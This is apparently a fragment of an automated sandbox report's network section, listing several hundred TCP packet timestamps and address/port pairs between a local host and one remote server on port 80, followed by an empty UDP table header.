                                                          May 19, 2022 14:41:40.941545010 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941579103 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941605091 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941606998 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941634893 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941634893 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941664934 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941670895 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941694975 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941704035 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941725016 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941730976 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941754103 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941760063 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941782951 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941792011 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941812038 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941821098 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941839933 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941859007 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941919088 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979212046 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979264021 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979295969 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979322910 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979346037 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979348898 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979372025 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979388952 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979398966 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979423046 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979444981 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979468107 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979474068 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979506969 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979553938 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979573965 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979600906 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979623079 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979634047 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979648113 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979656935 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979672909 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979695082 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979698896 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979718924 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979722977 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979744911 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979768991 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979778051 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979793072 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979816914 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979819059 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979860067 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979902029 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979907036 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979929924 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979953051 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979959965 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.979978085 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.979995012 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.980005980 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.980029106 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.980034113 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.980051041 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.980077982 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.980124950 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.981345892 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.981380939 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.981441021 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.981496096 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.982012033 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.982076883 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.982146025 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.982204914 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.982860088 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.982888937 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.982917070 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.982943058 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.982945919 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.982969999 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.982976913 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.982996941 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983020067 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983043909 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983047962 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983071089 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983074903 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983098984 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983099937 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983125925 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983138084 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983154058 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983161926 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983179092 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983195066 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983202934 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983228922 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983232021 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983253956 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983267069 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983279943 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983305931 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983331919 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983352900 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983355999 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983357906 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983380079 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983393908 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983407021 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983432055 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983449936 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983458042 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983473063 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983484983 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983510971 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983515024 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983534098 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983560085 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983583927 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983586073 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983611107 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983633995 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983650923 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983654976 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983655930 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983679056 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983705044 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983716011 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983728886 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983750105 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983752012 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.983800888 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.983823061 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.019817114 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.019865036 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.019895077 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.019923925 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.019952059 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.019963026 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.019977093 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020005941 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020023108 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020032883 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020061970 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020092010 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020103931 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020122051 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020144939 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020148993 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020178080 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020195961 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020207882 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020237923 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020245075 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020265102 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020275116 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020292997 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020322084 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020345926 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020348072 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020375967 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020381927 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020405054 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020406961 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020451069 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020519018 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020548105 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020576000 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020579100 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020601988 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020628929 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020629883 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020657063 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020664930 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020683050 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020711899 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020721912 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020740032 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020755053 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020766020 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020795107 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020808935 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020859957 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020874023 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020885944 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020908117 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020915031 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020944118 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020956993 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020970106 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.020992994 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.020996094 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021024942 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021029949 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021050930 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021076918 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021079063 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021106958 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021112919 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021128893 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021157980 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021161079 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021183968 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021207094 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021210909 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021239996 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021250963 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021272898 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021296024 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021300077 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021327972 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021339893 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021353006 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021380901 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021392107 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021409035 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021436930 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021439075 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021466017 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021471024 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021492004 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021513939 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021519899 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.021568060 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.021615028 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.022139072 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.022201061 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.022303104 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.022332907 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.022357941 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.022360086 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.022386074 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.022425890 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.023010969 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.023055077 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.023082972 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.023118973 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.023147106 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.023173094 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.023196936 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.023222923 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024192095 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024243116 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024272919 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024274111 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024311066 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024316072 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024352074 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024360895 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024377108 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024395943 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024405956 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024435043 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024435997 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024461985 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024497986 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024513960 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024535894 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024540901 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024571896 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024580002 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024602890 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024626970 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024636030 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024661064 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024667978 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024699926 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024708033 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024729013 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024750948 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024761915 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024785995 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024791956 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024828911 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024832010 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024857044 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024868965 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024888039 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024908066 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024919987 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024945021 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.024950027 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024985075 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.024992943 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025013924 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025038958 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025043964 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025079966 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025089979 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025114059 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025142908 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025146008 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025168896 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025201082 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025204897 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025228977 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025243044 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025263071 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025290966 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025291920 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025319099 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025355101 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025358915 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025383949 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025386095 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025417089 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025446892 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025449038 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025475979 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025494099 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025509119 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025542974 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025549889 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025574923 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025599003 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025610924 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025635004 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025640965 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025670052 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025691032 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025688887 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025711060 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025732040 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025736094 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025753975 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025777102 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025789022 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025798082 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025819063 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025821924 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025841951 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025862932 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025882959 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025883913 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025907040 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025928974 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025952101 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025952101 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025974035 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.025990963 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.025995016 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026017904 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026040077 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026041031 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026062965 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026083946 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026086092 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026108027 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026130915 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026130915 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026154041 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026170969 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:41.026173115 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026210070 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:41.026252985 CEST4970380192.168.2.313.107.40.203

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
